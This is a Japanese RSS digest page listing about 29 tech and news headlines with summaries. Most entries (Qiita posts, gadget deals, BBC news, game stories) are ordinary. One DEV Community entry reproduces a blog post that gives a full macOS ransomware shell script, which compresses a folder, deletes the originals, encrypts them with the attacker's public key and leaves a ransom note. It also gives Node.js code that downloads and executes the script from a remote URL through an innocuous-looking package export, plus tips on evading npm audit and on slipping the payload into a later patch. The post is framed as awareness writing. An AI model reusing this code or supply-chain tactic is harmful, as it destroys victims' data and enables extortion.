投稿時間:2022-05-07 01:25:37 RSSフィード2022-05-07 01:00 分まとめ(29件)

カテゴリー等	サイト名等	記事タイトル・トレンドワード等	リンクURL	頻出ワード・要約等/検索ボリューム	登録日
IT	気になる、記になる…	Satechiの2色のリバーシブルデザインが特徴のエコレザーデスクマットが15％オフに（2日間限定）	https://taisy0.com/2022/05/07/156656.html	satechi	2022-05-06 15:19:52
python	Pythonタグが付けられた新着投稿 - Qiita	Flaskについてまとめ5	https://qiita.com/TaichiEndoh/items/f2ddbd49cf0417ebc1e9	flask	2022-05-07 00:30:19
js	JavaScriptタグが付けられた新着投稿 - Qiita	【１０日目】12星座判定アプリの作成 [Monacaを使用]	https://qiita.com/ri6616/items/562998878da69f887a05	monaca	2022-05-07 00:16:13
GCP	gcpタグが付けられた新着投稿 - Qiita	Google Cloud アップデート (4/28-5/4/2022)	https://qiita.com/kenzkenz/items/7f5f74d70272d55ae2bf	cloudsqlap	2022-05-07 00:12:49
Ruby	Railsタグが付けられた新着投稿 - Qiita	【Rails】deviseのviewsをカスタマイズする方法	https://qiita.com/parkon_hhs/items/35217801afb67220979f	devise	2022-05-07 00:18:26
海外TECH	Ars Technica	Rogue Legacy 2 review: A perfect sequel to a great game	https://arstechnica.com/?p=1852530	gameaddictive	2022-05-06 15:53:58
海外TECH	Ars Technica	The world’s biggest hydrogen fuel cell EV has started work in South Africa	https://arstechnica.com/?p=1852681	cells	2022-05-06 15:13:42
海外TECH	MakeUseOf	How to Horizontally Flip or Invert Your Computer Display	https://www.makeuseof.com/how-to-horizontally-flip-invert-computer-display/	display	2022-05-06 15:30:14
海外TECH	MakeUseOf	Why Is Google Chrome Using So Much RAM? Here's How to Fix It	https://www.makeuseof.com/tag/chrome-using-much-ram-fix-right-now/	chrome	2022-05-06 15:05:14
海外TECH	DEV Community	Running a ransomware attack in a Node.js module	https://dev.to/devdevcharlie/running-a-ransomware-attack-in-a-nodejs-module-4hgb	Running a ransomware attack in a Node js modulePost originally posted on my blogA couple of weeks ago I experimented with creating a small ransomware script and looked into how to run it in a Node js module This post is a write up explaining how I went about it ️Important notes ️I am writing this blog post for educational purposes only Running ransomware attacks is illegal my only motivation is to share knowledge and raise awareness so people can protect themselves I am not taking any responsibility for how you decide to use the information shared in this post The code samples that follow were tested on macOS I assume the concept would be the same for other operating systems but the commands might differ a little What does it do Before diving into the code I want to explain shortly what this attack does A custom Node js module fetches a shell script hosted on a cloud platform creates a new file on the target s computer and executes it The script navigates to a specific folder on the target s computer compresses and encrypts that folder using asymmetric encryption What this means is that the target s files are encrypted using the attacker s public key and cannot be decrypted without this same person s private key As a result the only way for the target to get their files back is to pay the ransom to the attacker to get the private key If this sounds interesting to you the rest of this post covers how it works Creating the scriptFirst things first there s a script file called script sh It starts by navigating to a folder on the target s computer For testing purposes I created a test folder on my Desktop called folder to encrypt so my shell script navigates to the Desktop In a real attack it would be more efficient to target another folder for example Users cd Users lt your username gt DesktopThe next step is to compress the folder folder to encrypt using tar tar czf folder to encrypt tar gz folder to encryptThe czf flag stands for c compressz gzip compression f determine the archive file s file name typeAt this point running bash script sh will result in seeing both folder to encrypt and folder to encrypt tar gz on the Desktop In the context of ransomware people should not have access to their original file or folder so it also needs to be deleted rm rf folder to encryptAt this point the original folder is deleted but the file that s left is only in compressed format so it can be decompressed and restored by double clicking it This would defeat the purpose for people to be able to restore their files so the next step is asymmetric encryption with openssl EncryptionWithout going into too much details asymmetric encryption works with two keys a public one and a private one The public key is the one used to encrypt the data It can be shared with people so they can encrypt data they would want the keys owner to be able to decrypt The private key on the other hand needs to stay private as it is the decryption key Once data is encrypted with the public key it can only be decrypted with the associated private key The next step is then to generate the private key with the following command openssl genrsa aes out private pemThis command uses AES Advanced Encryption Standard and more specifically the bit encryption When the above command is run the key is saved in a file called private pem The public key is then generated with the command below openssl rsa in private pem pubout gt public pemAfter the keys are generated I save the public key in a new file on the target s computer One way to do this is with the following lines echo BEGIN PUBLIC KEY lt your key here gt END PUBLIC KEY gt key pemGetting the info needed from the public key can be done with the command head public pemNow the compressed file can be encrypted openssl rsautl encrypt inkey key pem pubin in folder to encrypt tar gz out folder to encrypt encThe command above uses the new file key pem created on the target s computer that contains the public key and uses it to encrypt the compressed file into a file called folder to encrypt enc At this point the orignal compressed file is still present so it also needs to be deleted rm rf folder to encrypt tar gzAfter this the only way to retrieve the content of the original folder is to get access to the private key to decrypt the encrypted file As a last step a note can be left to let the target know they ve just been hacked and how they should go about paying the ransom This part is not the focus of this post echo You ve been hacked Gimme all the moneyz gt note txtBefore moving on to running this into a Node js module I want to talk briefly about how to decrypt this file DecryptionAt this point running the following command in the terminal will decrypt the file and restore the original compressed version openssl rsautl decrypt inkey private pem in Users lt your username gt Desktop folder to encrypt enc gt Users lt your username gt Desktop folder to encrypt tar gz Complete code sampleThe complete script looks like this cd Users lt your username gt Desktopecho BEGIN PUBLIC KEY lt your public key gt END PUBLIC KEY gt key pemtar czf folder to encrypt tar gz folder to encryptrm rf folder to encryptopenssl rsautl encrypt inkey key pem pubin in folder to encrypt tar gz out folder to encrypt encrm rf folder to encrypt tar gzecho You ve been hacked Gimme all the moneyz gt note txtNow how can people be tricked into using it Hiding ransomware in a Node js moduleThere are multiple ways to go about this One of them would be to package up the shell script as part of the Node js module and execute it when the package is imported However having the script as a file in the repository would probably raise some concerns pretty fast Instead I decided to use the fs built in package to fetch a URL where the script is hosted copy the content to a new file on the target s computer and then use child process execFile to execute the file when the package is imported in a new project This way it might not be obvious at first sight that the module has malicious intent Especially if the JavaScript files are minified and obfuscated Creating the Node js moduleIn a new Node js module I started by writing the code that fetches the content of the script and saves it to a new file called script sh on the target s computer import fetch from node fetch import fs from fs async function download const res await fetch http lt some site gt script sh await new Promise resolve reject gt const fileStream fs createWriteStream script sh res body pipe fileStream fileStream on finish function resolve Then it s time to execute it to run the attack const run async gt await download execFile bash script sh export default function innocentLookingFunction return run And that s it for the content of the package For a real attack to work more code should probably be added to the module to make it look like it is doing something useful Running the attackTo test this attack I published the package as a private package on npm to avoid having people inadvertently install it After importing and calling the default function the attack is triggered import innocentLookingFunction from charliegerard such a hacker innocentLookingFunction Done SecurityYou might be thinking For sure this would be picked up by some security auditing tools From what I ve seen it isn t npm auditRunning npm audit does not actually check the content of the modules you are using This command only checks if your project includes packages that have been reported to contain vulnerabilities As long as this malicious package isn t reported npm audit will not flag it as potentially dangerous SnykI didn t research in details how Snyk detects potential issues but using the Snyk VSCode extension did not report any vulnerabilities either Socket devAt the moment the Socket dev GitHub app only supports typosquat detection so I didn t use it for this experiment Additional thoughts You d have to get people to install the package first Personally I see this as this easiest part of the whole process People install lots of different packages even small utility functions they could write themselves I could create a legitimate package publish the first version without any malicious code get people to use it and down the line add the malicious code in a patch update Not everyone checks for what is added in patches or minor version updates before merging them At some point some people will understand where the ransomware came from and flag it but by the time they do the attack would have already affected a certain number of users Staying anonymousFor this one I don t have enough knowledge to ensure that the attacker would not be found through the email address used to publish the package on npm or through tracking the ransomware transactions There s probably some interesting things to learn about money laundering but I know nothing about it When it comes to where the script is hosted I used a platform that allows you to deploy a website without needing to sign up so this way there might not be an easy way to retrieve the identity of the attacker Last noteI wanted to end on an important point which is the main reason why I experimented with this It took me a few hours on a Sunday afternoon to put this together without any training in security A part of me was hoping it wouldn t be possible or at least not that easy so I d feel more comfortable using random packages but I am now thinking a bit differently I am only interested in learning how things work but that s not the case for everyone so if I can do it a lot of other people with malicious intent can too I don t know if an attack like this can be completely avoided but be careful when installing packages update things regularly and think twice before merging updates without checking changelogs and file changes	2022-05-06 15:47:15
海外TECH	DEV Community	What if there was a CLI called "py" that got you working right away?	https://dev.to/deadwisdom/what-if-there-was-a-cli-called-py-that-got-you-working-right-away-3cmn	What if there was a CLI called quot py quot that got you working right away I m tired of dealing with runtimes and virtual environments and remembering how to get everything set up for various projects and I ve been programming Python for years now I don t even understand how novice devs get along these days ScaffoldingIn learning science there is an idea of scaffolding This is a way of teaching that crosses the gap between providing rails or crutches which make learners depend on the tools often unable to move beyond them and free form which leaves learners out by themselves often paralyzed by the possibilities Scaffolding finds a good center where learners and pros alike can get their bearings pick comfortable directions and feel supported along the way Two great ways to perform scaffolding are one to provide examples which can be taken wholly at first and then deviated from and also through an emphasis on goal setting which lets learners see clearly their paths ahead of them What does this have to do with a python CLI you might wonder Well that s exactly the issue it doesn t usually But what if we made a CLI that embraced scaffolding And so here is my goal to experiment with a different kind of CLI that works with goals and examples Introducing PyOf course all of this is ephemeral at this point I haven t created it yet but I ve begun experimenting and I d love to know what people think Py has two modes of running Firstly a user friendly CLI to run python programs setup install projects environments and runtimes run recipes of all sorts and generally be a very simple hub of activity for any sort of python related tasks But most importunately does this while negotiating virtual environments and runtimes cleanly This first mode would certainly step on some toes of some great projects like pyenv and poetry but would rather use them rather than make them obsolete The second mode of running would be if you just typed in py This is where the scaffolding comes into play Instead of seeing a crufty help screen you would see something of a screen like this Thanks to Rich for the wonderful interface API With Rich we can now create much more compelling terminal user experiences which is something I wish to leverage here GoalsThe goals you first get might be general they might change based on your usage or if you are in an existing project And maybe your school or company could customize these based on common needs Some initial goals might be Initialize a new python project Create a new project by selecting a runtime environment e g python creating a virtual environment and setting up a pyproject toml with dependencies Check out an existing project and prepare to run it Clone or download an existing project and prepare your environments to run it Run the python shell Run the latest python shell IDLE or a notebook View and modify your local python environments and installations See a list of runtime environments and potentially upgrade or edit them And finally Browse other goals and find more created by the community Which I imagine as a sort of mini pypi user submitted catalog of goals and recipes browsable right here in the CLI Imagine things like Start a new data science project or even Begin Sarah s machine learning tutorial ProjectSo if this interests you send me some feedback I d love to hear if you like the idea obstacles etc I don t have a lot of free time to work on this so also if you d like to jump in let s go	2022-05-06 15:21:24
海外TECH	DEV Community	React Tricks Miniseries 7: How to setState for different data types	https://dev.to/theeasydev/react-tricks-miniseries-7-how-to-setstate-for-different-data-types-25ne	React Tricks Miniseries How to setState for different data typesSetting state in react has always been a tricky thing There are many ways to do it but most of them are anti patterns whereas only a few ways are correct and best practice Let s take a look at how to correctly set a react state in the scenarios of different data types Let s skip strings since those are trivial NumbersIgnoring the case where we simply replace the number updating a number state should be performed like thissetNumber prev gt prev same for minus multiple divide etcObject states are set by using the spread syntax ObjectssetUser prev gt user newKey newValue OR updateKey updateValue Array states are set by creating a new array inside the setState and simply inserting the new element after the previous state of the array ArrayssetFruits prev gt prev apple orsetFruits prev gt prev name Apple price ConclusionSetting states for different data types can get tricky by using the best practices always using the previous value we can update the state using the proper methods	2022-05-06 15:15:35
Apple	AppleInsider - Frontpage News	AWS GameKit now supports Unreal Engine-developed games on iPhone, Mac	https://appleinsider.com/articles/22/05/06/aws-gamekit-now-supports-unreal-engine-developed-games-on-iphone-mac?utm_medium=rss	AWS GameKit now supports Unreal Engine developed games on iPhone MacAmazon has announced that its AWS GameKit platform now supports Android iOS and macOS games developed with the Unreal Engine Gaming on an iPhoneThe AWS GameKit platform which launched in March allows developers to build AWS powered games with the Unreal Editor Amazon s latest update now brings that ability to developers of iOS and macOS games Read more	2022-05-06 15:52:06
Apple	AppleInsider - Frontpage News	Apple's Jane Horvath to chair panel on the future of privacy	https://appleinsider.com/articles/22/05/06/apples-jane-horvath-to-chair-panel-on-the-future-of-privacy?utm_medium=rss	Apple x s Jane Horvath to chair panel on the future of privacyJane Horvath Apple s senior director of Global Privacy will chair at the th annual Computers Privacy Data Protection CPDP conference in Brussels talking about technology regulation and international cooperation Jane Horvath speaking at CES in Horvath only rarely speaks at security events with her most notable appearance being at CES in She s now listed as a speaker for the th annual CPDP conference although the provisional schedule has her chairing a panel instead of presenting a speech Read more	2022-05-06 15:38:49
Apple	AppleInsider - Frontpage News	Daily deals May 6: Buy 2, save 30% on Apple accessories, up to 77% off Amazon devices, more	https://appleinsider.com/articles/22/05/06/daily-deals-may-6-buy-2-save-30-on-apple-accessories-up-to-77-off-amazon-devices-more?utm_medium=rss	Daily deals May Buy save on Apple accessories up to off Amazon devices moreFriday s best deals include savings on official Apple accessories refurbished Amazon devices a great gaming PC and much more for your last minute Mother s Day shopping Buy save on Apple accessories up to off Amazon devices and inch Amazon Fire TV all available todayEach day we list off some of the best discounts we ve seen across the web on Apple products smartphones smart TVs and lots of other items all because we re in the business of helping to save you some money If an item is out of stock you may still be able to order it for delivery at a later date Many of the Amazon discounts are likely to expire soon though so act fast Read more	2022-05-06 15:31:38
Apple	AppleInsider - Frontpage News	Beats unveils new Powerbeats Pro in collaboration with London designer	https://appleinsider.com/articles/22/05/06/beats-unveils-new-powerbeats-pro-in-collaboration-with-london-designer?utm_medium=rss	Beats unveils new Powerbeats Pro in collaboration with London designerApple s Beats by Dre subsidiary has released a new limited edition version of its Powerbeats Pro headphones in collaboration with London designer Paria Farzaneh Credit Beats by DreThe special edition Bluetooth headphones feature a special yellow and dark purple pattern inspired by Farzaneh s designs Farzaneh is an English Iranian designer based in the U K Read more	2022-05-06 15:03:24
Apple	AppleInsider - Frontpage News	How to use Conversation Boost with AirPods Pro	https://appleinsider.com/articles/21/10/06/how-to-use-conversation-boost-with-airpods-pro?utm_medium=rss	How to use Conversation Boost with AirPods ProApple s latest hearing technology is now available on AirPods Pro and it s easy to use ーbut oddly fiddly to set up Conversation Boost helps you hear people talking to youThis could be simpler Apple is brilliant with accessibility features but often setting them up requires a lot of steps and Conversation Boost certainly does Read more	2022-05-06 15:02:00
海外TECH	Engadget	You can buy a gold-plated Wii originally made for the Queen	https://www.engadget.com/24-karat-gold-wii-queen-elizabeth-ii-auction-151520864.html?src=rss	You can buy a gold plated Wii originally made for the QueenYou now have the chance to own a truly one of a kind Nintendo Wii provided you have the well stuffed bank account to match Kotakureports Dutch collector and Consolevariations owner Don is auctioning an infamous karat gold plated Wii bankrupt game developer THQ intended to deliver to Queen Elizabeth II in The system was meant as a promo piece for the forgettable mini game collection Big Family Games but never made it to Buckingham Palace due to an quot understandably strict quot royal gift policy It returned to THQ and popped up in after a collector obtained it from a studio contact The unnamed owner eventually sold to Don nbsp Don first tried to sell the golden Wii on eBay in October with an asking price of The marketplace shut him down however as a policy change flagged accounts that sold items at prices far outside of their usual range The new auction is at Goldin which doesn t have similar reservations You ll want to brace yourself if you re considering a purchase Bidding has already reached as of this writing and we d expect it to climb much higher if not necessarily to by the time the auction closes the evening of May st This also isn t a mint condition item as there are signs of quot scattered quot gold chipping And given that Nintendo shut down online multiplayer and Wii Shop services years ago you probably won t do more with this machine than stare at it lovingly through a glass case Nonetheless it won t be surprising if someone snaps up this Wii Unlike many special edition consoles this is a genuinely unique device with a story behind it And like Nintendo World Championship cartridges or similar rarities it s as much a snapshot of a moment in gaming history as anything else The K gold Wii was the product of an era when audacious publicity stunts were still relatively commonplace in the game industry and the new owner will likely remember that period for a long time to come	2022-05-06 15:15:20
海外TECH	Engadget	'Legend of Zelda: Ocarina of Time' and 'Ms. Pac-Man' join the Video Game Hall of Fame	https://www.engadget.com/ocarina-of-time-ms-pac-man-ddr-civilization-video-game-hall-of-fame-150454915.html?src=rss	x Legend of Zelda Ocarina of Time x and x Ms Pac Man x join the Video Game Hall of FameThe Strong National Museum of Play has revealed the Video Game Hall of Fame class of This year s quartet of honorees are Ms Pac Man Sid Meier s Civilization The Legend of Zelda Ocarina of Time nbsp and Dance Dance Revolution The finalists that just missed out on a spot this time are Assassin s Creed Candy Crush Saga Minesweeper NBA Jam PaRappa the Rapper Resident Evil Rogue and Words with Friends All of those are classics in their own way but it s hard to argue with any of the four picks Ocarina of Time made it into the Hall of Fame as a first time nominee The first D Zelda title is widely regarded as one of the best games of all time and it remains the highest scoring game ever on Metacritic It paved the way for the last two and a half decades of action games Ocarina of Time walked so Breath of the Wild could run Influential simulation and strategy title Sid Meier s Civilization was first named as a finalist back in and again in Arcade icons Ms Pac Man and DDR each made the shortlist once before They join the likes of Super Mario Bros Doom Mortal Kombat Tetris nbsp and Animal Crossing As Eurogamer notes Zelda and Pac Man are the first two series with more than one entry in the Video Game Hall of Fame though Super Mario Kart is in there as well	2022-05-06 15:04:54
海外科学	NYT > Science	Deadly Venom From Spiders and Snakes May Also Cure What Ails You	https://www.nytimes.com/2022/05/03/science/venom-medicines.html	Deadly Venom From Spiders and Snakes May Also Cure What Ails YouEfforts to tease apart the vast swarm of proteins in venom ーa field called venomics ーhave burgeoned in recent years leading to important drug discoveries	2022-05-06 15:41:23
海外科学	NYT > Science	Signs of an Animal Virus Discovered in Man Who Received a Pig’s Heart	https://www.nytimes.com/2022/05/05/health/pig-heart-transplant-virus.html	complications	2022-05-06 15:16:46
金融	RSS FILE - 日本証券業協会	PSJ予測統計値	https://www.jsda.or.jp/shiryoshitsu/toukei/psj/psj_toukei.html	統計	2022-05-06 16:00:00
金融	金融庁ホームページ	金融安定理事会による「気候関連リスクに対する規制・監督手法：中間報告書」について掲載しました。	https://www.fsa.go.jp/inter/fsf/20220506/20220506.html	中間報告	2022-05-06 17:00:00
ニュース	BBC News - Home	Sir Keir Starmer investigated over alleged lockdown breach	https://www.bbc.co.uk/news/uk-politics-61352174?at_medium=RSS&at_campaign=KARANGA	office	2022-05-06 15:20:17
ニュース	BBC News - Home	Platinum Jubilee: Harry and Andrew will not appear on Buckingham Palace balcony	https://www.bbc.co.uk/news/uk-61351158?at_medium=RSS&at_campaign=KARANGA	jubilee	2022-05-06 15:03:35
ニュース	BBC News - Home	Election results 2022: Prof Sir John Curtice on what they show so far	https://www.bbc.co.uk/news/uk-politics-61347764?at_medium=RSS&at_campaign=KARANGA	curtice	2022-05-06 15:11:48
ニュース	BBC News - Home	Champions League final: Liverpool manager Jurgen Klopp questions ticket allocation	https://www.bbc.co.uk/sport/61354435?at_medium=RSS&at_campaign=KARANGA	Champions League final Liverpool manager Jurgen Klopp questions ticket allocationLiverpool boss Jurgen Klopp questions why almost half the tickets for the Champions League final against Real Madrid are not allocated to the clubs	2022-05-06 15:08:08
ニュース	BBC News - Home	John Yems: Crawley Town part company with manager in wake of racism claims	https://www.bbc.co.uk/sport/football/61349180?at_medium=RSS&at_campaign=KARANGA	allegations	2022-05-06 15:51:26
北海道	北海道新聞	日英首脳、福島産商品味わう　ポップコーン、輸入規制解除歓迎	https://www.hokkaido-np.co.jp/article/677713/	岸田文雄	2022-05-07 00:07:51